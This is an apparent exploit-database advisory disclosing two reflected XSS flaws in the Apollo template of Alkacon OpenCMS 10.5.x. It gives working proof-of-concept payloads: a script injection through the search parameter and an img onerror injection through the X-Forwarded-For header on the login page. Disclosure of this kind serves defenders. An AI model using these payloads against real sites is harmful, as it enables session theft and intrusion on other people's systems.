Share
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template  
# Google Dork: N/A  
# Date: 18/07/2019  
# Exploit Author: Aetsu  
# Vendor Homepage: http://www.opencms.org  
# Software Link: https://github.com/alkacon/apollo-template  
# Version: 10.5.x  
# Tested on: 10.5.5 / 10.5.4  
# CVE : CVE-2019-13234, CVE-2019-13235  
  
1. Reflected XSS in the search engine:  
- Affected resource -> "q"  
POC:  
```  
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&  
```  
2. Reflected XSS in login form:  
POC:  
The vulnerability appears when the header X-Forwarded-For is used as shown  
in the next request:  
```  
GET  
/login/index.html?requestedResource=&name=Editor&password=editor&action=login  
HTTP/1.1  
Host: example.com  
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja  
```  
  
  
Extended POCs: https://aetsu.github.io/OpenCms